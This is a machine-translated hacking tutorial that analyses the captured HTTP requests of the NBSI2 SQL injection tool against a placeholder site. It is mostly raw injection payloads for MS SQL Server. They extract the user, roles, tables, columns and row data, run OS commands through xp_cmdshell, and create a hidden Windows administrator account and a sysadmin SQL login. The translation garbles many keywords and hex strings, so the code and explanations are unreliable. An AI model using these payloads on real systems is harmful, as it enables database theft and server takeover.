NBSI2 internal function realizes a big secret
Since the time, SQL injection is very popular. The people who have used Xiaozhu's NB2 may know that this tool is close to invincible, and the rookie uses it to put a station to black, but do not understand the injection process can always be mentioned forever. Let's go ~~
First of all, I am just a rookie, just recently studying SQL, just studying the NB2 injection process, the tool WSE, I believe everyone will not be strange, I have to have the Internet, I will give an address, http: //www.gxgl.com/soft/wse06b1.zip, which is a program used to monitor and modify the network to send and receive data, which can be used to help you debug the web application.
Less nonsense, start, first find a SQL injection vulnerability to get a site www.testdb.net, find an injection point: http://www.testdb.net/Article_read.asp? Id = 80
Oh, www.testdb.net This website is of course not existent.
Procedure 1, get SQL Server Database Information
Open the NB2, enter the address: http://www.testdb.net/Article_read.asp? Id = 80, select the "GET" mode, click the "Detect" button to get the SQL Server database as follows:
Multi-sentence execution: unknown child query: Support current users: TEST User Permissions: DB_OWNER Current Library: TestDB
People who have used NB2 should be familiar with the above content ~~
% 20 is interpreted as space% 2B interpretation number,% 25 explained to%
HTTP / 1.1 200 ok // Return success HTTP / 1.1 500 Internal Server Error
Use WSE to detect GET package information as follows:
Get /article_read.asp?id=80 http / 1.1
GET /ATICLE_READ.ASP?id=80 and User+char (124 )=0 http / 1.1: article_read.asp? Id = 80 and user char (124) = 0 char (124) is character '|'
GET /ARTICLE_READ.ASP?id=80; Declare @a INT - http / 1.1: article_read.asp? Id = 80; declare @a int - // Decision support multiple queries
GET /ATICLE_READ.ASP ?ID=80 and (select count(1 ) From [sysobjects]) =0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: articleid = 80% 3Bdeclare % 40a int% 2D% 2D; ASPSESSIONIDSSTCTTQD = Ellnneidceeanbmokamgjged
That is: article_read.asp? Id = 80 and (select count (1) from [sysObjects])> = 0 // Judgment whether the subquerow
Get/article_read.asp?id=80 and User+char (124 )=0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0; AskSESSIONIDSSTCTTQD = Ellnneidceeanbmokamgjged
That is: article_read.asp? Id = 80 and user char (124) = 0 // gets the current user user User is a built-in variable of SQL Server, and its value is the username currently connected, and the type is nvarchar. Take a nvarchar's value compare the number of int 0, the system will try to
NVARCHAR's value is turned into int type, and it will definitely be wrong during the transfer. Of course, the process will definitely be wrong in the process.
When you change the data type, a grammatical error occurs, huh, Oh, EAST_ASP is the value of the variable user, so that the power of the database is not scrapped. And User> 0
Get /article_read.asp?id=80 and cast (is_srvrolemember ") 90069006E00 ) AS varchar(1) ]+char (124)
= 1 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netconnection: Keep-alivecache- Control: no-cachecookie: articleid = 80 and % 28select count% 281% 29 from % 5bsysObjects% 5D% 29% 3E% 3D0;
AskSESSIONIDSSTCTTQD = Ellnneidceeanbmokamgjged
That is: article_read.asp? Id = 80 and casket (is_srvrolemember) (0x730079007300610064006D0069006E00) As varchar (1)) char (124) = 1
Function Description:
Is_srvroleMember indicates whether the current user login is a member of the specified server role.
Syntax IS_SRVROLEMBER ('role' [, 'login'])
The name of the server role of the parameter 'role' is checked. Role's data type is sysname. Role valid values are: Sysadmin, Dbcreator, Diskadmin, Processadmin, ServerAdmin, Etupadmin, SecurityAdmin
'login'
The optional name of the login will be checked. Login's data type is sysname, the default value is NULL. If not specified, use the current user's login account. SELECT CAST (IS_SRVROLEMEMBER (0x730079007300610064006D0069006100) As varchar (1)) Char (124) result is "1 |"
GET /ATICLE_READ.ASP ?ID=80 and cast (intend " A0065007200 ) AS varchar (12 ) varchar (124 ) varchar (124 )=1
HTTP / 1.1ACCEPT: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netconnection: Keep-alivecache-control: No-cachecookie: ArticleID = 80 and % 28select count% 281% 29 from % 5bsysObjects% 5D% 29% 3E% 3D0; aspsessionidsstcttqd = Ellnneidceeanbmokamgjged
That is: article_read.asp? Id = 80 and cast (is_member (0x640062005f006f0077006e0065007200) AS varchar (1)) char (124) = 1
SELECT CAST (IS_MEMBER (0x640062005007200) AS var (1)) char (124) The result is "1 |", and the result is the same, but pay attention
The long string in is_member is different from the above, I don't know what it means. 0x730079007300610064006d0069006E00 is transformed into "| o | @ e", this thought
It is a string of "sysadmin", but it seems not, forget it, don't want it, huh, but I think it should be the right to get the current user, such as: DB_OWNER
GET /ATICLE_READ.ASP?id=80 and db_name()+char (124 )=0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user- Agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0;
AskSESSIONIDSSTCTTQD = Ellnneidceeanbmokamgjged
That is: article_read.asp? Id = 80 and db_name () char (124) = 0 This sentence, see there is a db_name () function, don't say more, everyone should know, db_name () is another system variable, The returned database name is returned.
At the time, the process of obtaining the SQL database information is calculated that the analysis is complete. In addition: The post method is no longer analyzed in detail. You can look at it yourself. Below is the package captured when the Post method is, the specific is basically the same as the GET method, mainly to see the last line information. Among them, many techniques are also used: as follows:
ID = 80% 20And% 20User% 2bchar (124) = 0ID = 80 '% 20and% 20User% 2bchar (124) = 0% 20And% 20' '=' ID = 80% 25 '% 20and% 20User% 2bchar (124 ) = 0% 20And% 20 '% 25' = 'ID = 80% 20and% 201 = 1 ID = 80% 20and% 201 = 2ID = 80'% 20And% 201 = 1% 20and% 20 '' = 'ID = 80 '% 20AND% 201 = 2% 20And% 20' '=' ID = 80% 25 '% 20and% 201 = 1% 20And% 20'% 25 '=' ID = 80% 25 '% 20and% 201 = 2% 20AND% 20 '% 25' = '
//
Process 2, guess the table name
TOP1
GET /ATICLE_READ.ASP?id=80 and (select top 1 cast (Name AS varchar(8000) ] FROM (SELECT top 1 ID ,NAME%
20FROM% 20 [TestDb] .. [Sysobjects]% 20where% 20XTYPE = CHAR (85)% 20ORDER% 20BY% 20ID)% 20T% 20ORDER% 20BY% 20ID% 20DESC)> 0 http / 1.1
That is: article_read.asp? Id = 80 and (select top 1 cast (Name As Varchar (8000)) from (SELECT TOP 1 ID, Name from [Testdb] .. [sysobjects] where xtype = char (85) Order By ID ) T ORDER BY ID DESC)> 0 char (85) = 'u'
The role is to obtain the table name of the first table of the TestDB database, and push TOP N with this class, you can get other table names.
TOP2
GET /ATICLE_READ.ASP?id=80 and (select top 1 cast(Name AS varchar(8000) ] FROM (SELECT top 2 ID ,NAME%
20FROM% 20 [TestDb] .. [Sysobjects]% 20where% 20XTYPE = CHAR (85)% 20ORDER% 20BY% 20ID)% 20T% 20ORDER% 20BY% 20ID% 20DESC)> 0 http / 1.1
...
TOPN
WSE captured package information:
GET /ATICLE_READ.ASP?id=80 and (select top 1 cast (Name AS varchar(8000) ] FROM (SELECT top 1 ID ,NAME%
20FROM% 20 [testdb] .. [sysobjects]% 20where% 20XTYPE = CHAR (85)% 20ORDER% 20BY% 20ID)% 20T% 20DER% 20BY% 20ID% 20DESC)> 0 http / 1.1accept: image / gif, Image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28select count% 281% 29 from % 5BSYSObjects% 5D% 29% 3E% 3D0
...........
//
Process three, in accordance with a table name guess list name: Article
TOP1
Get /article_read.asp?id=80 and (select top 1 cast(Name AS varchar(8000 ) From (select top 1%
20Colid, Name% 20FROM% 20 [TestDb] .. [Syscolumns]% 20where% 20ID% 20 =% 20Object_ID (nchar (101)% 2BNCHAR (97)% 2BNCHAR (115)% 2BNCHAR (116)%
2BNCHAR (104)% 2BNCHAR (111)% 2BNCHAR (116)% 2BNCHAR (46)% 2BNCHAR (46)% 2BNCHAR (65)% 2BNCHAR (82)% 2BNCHAR (84)% 2BNCHAR (73)% 2BNCHAR (67)%
2BNCHAR (76)% 2BNCHAR (69))% 20RDER% 20BY% 20Colid)% 20t% 20RDER% 20BY% 20Colid% 20DESC)> 0 http / 1.1
That is: article_read.asp? Id = 80 and (SELECT TOP 1 CAST (Name AS VARCHAR (8000)) from (SELECT TOP 1 Colid, Name from [Testdb] .. [syscolumn] where id = Object_id (nchar (101) Nchar (97) nchar (115) nchar (116) nchar (104) nchar (111) nchar (116) nchar (46) nchar (46) nchar (65) nchar (82) Nchar (84) nchar (73) nchar (67) nchar (76) nchar (69)) ORDER BY Colid) T ORDER BY Colid Desc)> 0
The role is to obtain the column name of the first column of the Article table, and push TOP N with this class, and other column names can be obtained.
Function Description:
Object_id returns the database object identification number.
Syntax Object_ID ('Object')
Parameter 'Object' To use the object. Object's data type is char or Nchar. If the data type of Object is char, it is hidden to convert it to nchar.
Return Type INT
Nchar (101) nchar (97) nchar (115) nchar (116) nchar (104) nchar (111) nchar (116) nchar (46) nchar (46) nchar (65) Nchar (82) nchar (84) nchar (73) NCHAR (67) NCHAR (76) NCHAR (69) corresponds to string testdb..Aticle
That is: article_read.asp? Id = 80 and (SELECT TOP 1 CAST (SELECT TOP 1 Colid, Name from [Testdb] .. [Syscolumn] where id = Object_id ('testdb .. Article ') Order By Colid) T ORDER BY Colid Desc)> 0
TOP2
Get /article_read.asp?id=80 and (select top 1 cast (Name AS varchar(8000 ) From (select top 2%
20Colid, Name% 20FROM% 20 [TestDb] .. [Syscolumns]% 20where% 20ID% 20 =% 20Object_ID (nchar (101)% 2BNCHAR (97)% 2BNCHAR (115)% 2BNCHAR (116)%
2BNCHAR (104)% 2BNCHAR (111)% 2BNCHAR (116)% 2BNCHAR (46)% 2BNCHAR (46)% 2BNCHAR (65)% 2BNCHAR (82)% 2BNCHAR (84)% 2BNCHAR (73)% 2BNCHAR (67)%
2BNCHAR (76)% 2BNCHAR (69))% 20RDER% 20BY% 20Colid)% 20t% 20RDER% 20BY% 20Colid% 20DESC)> 0 http / 1.1
TOPN
...
WSE captured package information:
Get /article_read.asp?id=80 and (select top 1 cast(Name AS varchar(8000 ) From (select top 1%
20Colid, Name% 20FROM% 20 [TestDb] .. [Syscolumns]% 20where% 20ID% 20 =% 20Object_ID (nchar (101)% 2BNCHAR (97)% 2BNCHAR (115)% 2BNCHAR (116)%
2BNCHAR (104)% 2BNCHAR (111)% 2BNCHAR (116)% 2BNCHAR (46)% 2BNCHAR (46)% 2BNCHAR (65)% 2BNCHAR (82)% 2BNCHAR (84)% 2BNCHAR (73)% 2BNCHAR (67)%
2BNCHAR (76)% 2BNCHAR (69))% 20RDER% 20BY% 20Colid)% 20t% 20RDER% 20BY% 20Colid% 20DESC)> 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, Image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5BSYSObjects% 5D% 29% 3E% 3D0
...............
//
Procedure four, specify the content according to the column name
Field name: Title
TOP1
GET /ATICLE_READ.ASP?id=80 and (select top 1 20ISNULL (Cast ([Title] AS varchar (8000)), CHAR (32 )+char(124 )%
20FROM% 20 (SELECT% 20top% 201% 20 [Title]% 20FROM% 20 [TestDB] .. [Article]% 20where% 201 = 1% 20RDER% 20BY% 20 [Title])% 20T% 20ORDER% 20BY% 20
[Title]% 20Desc)> 0 http / 1.1
That is: article_read.asp? Id = 80 and (Select Top 1 isnull (CAST ([Title] As Varchar (8000)), Char (32)) CHAR (124) from (SELECT TOP 1 [Title] from [testdb] .. [articles] Where 1 = 1 Order by [title]) T ORDER BY [TITLE] DESC)> 0
The role is to obtain the value of the first row record of the Title field, and push TOP N in this class, and the value of other rows can be obtained.
TOP2
GET /ATICLE_READ.ASP?id=80 and (select top 1 20ISNULL (Cast ([Title] AS varchar (8000)), CHAR (32 )+char(124 )%
20FROM% 20 (SELECT% 20top% 202% 20 [Title]% 20FROM% 20 [testdb] .. [article]% 20where% 201 = 1% 20RDER% 20BY% 20 [Title])% 20T% 20RDER% 20BY% 20
[Title]% 20Desc)> 0 http / 1.1
TOPN
...
WSE captured package information:
// Get the number of records of the Article table get /article_read.asp?id=80 and (select cast(count (1) AS varchar(8000 )%+char(124 ) From [testdb] .. [Article]%
20where% 201 = 1)> 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: www.testdb. netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0
/ / Get the first record content of the Title field of the article table
GET /ATICLE_READ.ASP?id=80 and (select top 1 20ISNULL (Cast ([Title] AS varchar (8000)), CHAR (32 )+char(124 )%
20FROM% 20 (SELECT% 20top% 201% 20 [Title]% 20FROM% 20 [TestDB] .. [Article]% 20where% 201 = 1% 20RDER% 20BY% 20 [Title])% 20T% 20ORDER% 20BY% 20
[Title]% 20Desc)> 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: www.testdb. netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E%
3D0
...............
//
At this point, the analysis of the table name, field name and field content is basically over, and then look at other main functions.
Procedure 5, execute DOS commands and execute SQL statements
Execute DOS command DIR C: /
Vision capture analysis:
GET /ATICLE_READ.ASP?id=80 and db_name()+char (124 )=0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user- Agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E%
3D0
GET /ATICLE_READ.ASP ?ID=80 ;ec master..xp_cmdshell 0'dir c:/% More 20020c:/nb_commander_txt.log';Drop Table%
20NB_Commander_Tmp; CREATE% 20TABLE% 20NB_Commander_Tmp (ResultTxt% 20varchar (7996)% 20NULL); BULK% 20INSERT% 20 [testdb] .. [NB_Commander_Tmp]% 20FROM% 20'C: /NB_Commander_Txt.log' WITH (KEEPNULLS) ; Alter% 20table% 20NB_Commander_TMP% 20ADD% 20ID%
20INT% 20NOT% 20null% 20Identity% 20 (1, 1) - http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E%
3D0
Mainly this:
? Article_read.asp id = 80; EXEC MASTER..XP_CMDSHELL 'Dir C: /> C: /NB_Commander_Txt.log'; DROP TABLE NB_Commander_Tmp; CREATE TABLE NB_Commander_Tmp (ResultTxt varchar (7996) NULL); BULK INSERT [testdb] .. [NB_COMMANDER_TMP] from 'c: /nb_commander_txt.log' with (KeepnUlls); alter table nb_commander_tmp address Int not null Identity% 20 (1, 1) -
Bulk INSERT replicates a data file to the database table or view in the format specified by the user. KeepnUlls Specifies a null value in a large-capacity replication operation, rather than assigns the default value to the inserted column. For details, please check the T-SQL syntax, which is described in detail.
The function of the above statement is to save the DOS command DIR C: / out of the file nb_commander_txt.log, then write the contents of this file to the new temporary table
NB_Commander_TMP, and add a self-growth field ID, I believe everyone is easy to understand.
ID = 1
Get /article_read.asp?id=80 and (select top 1 case when Resulttxt 200null Then 0'|' 2020En Resulttxt%
2b '|'% 20END% 20FROM% 20NB_Commander_TMP% 20where% 20ID = 1) = 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BEXEC MASTER% 2E% 2EXP% 5FCMDSHELL % 27Dir C% 3A% 5C % 3E C% 3A% 5CNB% 5Fcommander% 5FTXT% 2ELOG% 27% 3BDrop Table NB% 5Fcommander% 5FTMP% 3BCREATE TABLE NB% 5Fcommander% 5FTMP%
28Resulttxt varchar% 287996% 29 NULL% 29% 3BBULK INSERT % 5BtestDB% 5D% 2E% 2E% 5BNB% 5FCommander% 5FTMP% 5D from % 27C% 3A% 5CNB%
5Fcommander% 5FTXT% 2ELOG% 27 with % 28keepnulls% 29% 3Balter Table NB% 5FCommander% 5FTMP Add ID INT NOT NULL IDENTITY % 281% 2C1% 29%
2D% 2D
That is: article_read.asp? Id = 80 and (select top 1 case when the resultttxtX null dam | 'Else Resulttxt ' | 'end from nb_commander_tmp where id = 1) = 0
Enter the first echo results, the following, TOPN inputs all echo results.
ID = 2
Get /article_read.asp?id=80 and (select top 1 case when Resulttxt 200null Then 0'|' 2020En Resulttxt%
2b '|'% 20END% 20FROM% 20NB_Commander_TMP% 20where% 20ID = 2) = 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BEXEC MASTER% 2E% 2EXP% 5FCMDSHELL % 27Dir C% 3A% 5C % 3E C%
3A% 5CNB% 5FCommander% 5FTxt% 2Elog% 27% 3BDROP TABLE NB% 5FCommander% 5FTmp% 3BCREATE TABLE NB% 5FCommander% 5FTmp% 28ResultTxt varchar% 287996% 29 NULL% 29% 3BBULK INSERT % 5Btestdb% 5D% 2E% 2E% 5BNB% 5Fcommander% 5FTMP% 5D from % 27C% 3A% 5CNB%
5Fcommander% 5FTXT% 2ELOG% 27 with % 28keepnulls% 29% 3Balter Table NB% 5FCommander% 5FTMP Add ID INT NOT NULL IDENTITY % 281% 2C1% 29%
2D% 2D
ID = N
...............
Output display: [unexpected output] [unexpected output] [unexpected output] [accidental output] [accidental output] [accident output] [accident output] [accident output] [accident output] ....... .
If there is no problem normally, all files C: / down, the above prompt appears, the reason is that the data table NB_COMMANDER_TMP has not created success, so it cannot be output correctly.
Do not return to the capture package analysis: DOS command DIR C: /
GET /ATICLE_READ.ASP ?ID=80 ;ec master..xp_cmdshell 'dir c:/ '- http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BDROP TABLE NB% 5FCommander% 5FTmp% 3BEXEC Master% 2e% 2exp%
5FCMDSHELL % 27DEL C% 3A% 5CNB% 5Fcommander% 5FTXT% 2ELOG% 27% 2D% 2D
That is: article_read.asp? Id = 80; exec master "" Dir C: / '- does not need to display output results.
Output display: command execution completion
DOS command: net user tsinternetUsers Password / add
GET /ATICLE_READ.ASP ?ID=80 ;EC Master..net User TsInterNetUsers Password /Add' - http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BEXEC MASTER% 2E % 2EXP% 5FCMDSHELL % 27DIR C% 3A% 5C% 27% 2D% 2D Execute other DOS commands. ID = 80; exec master user tsinternetUsers password / add '- id = 80; exec master@xp_cmdshell' net localgroup administrators tsinternetUsers / add '-
Execute SQL commands (with execution dos command)
GET /ARTICLE_READ.ASP ?ID=80 ;Ec master..sp_addlogin USERNAME, Password - http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user- Agent: Microsoft URL Control - 6.00.8862Host: www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BEXEC MASTER% 2E% 2EXP% 5FCMDSHELL %
27NET User TsinterNetUsers Password % 2FADD% 27% 2D% 2D
ID = 80; exec master..sp_addlogin username, password - id = 80; exec master..np_addsrvrolemember username, sysadmin --....
At this point, the main function analysis of NB2 is complete, and other functions can analyze themselves. The first time I write such a long article, it may be very chaotic, but there must be many problems, but there is really no energy.
I'm going to modify, I hope everyone can understand. Thank you!
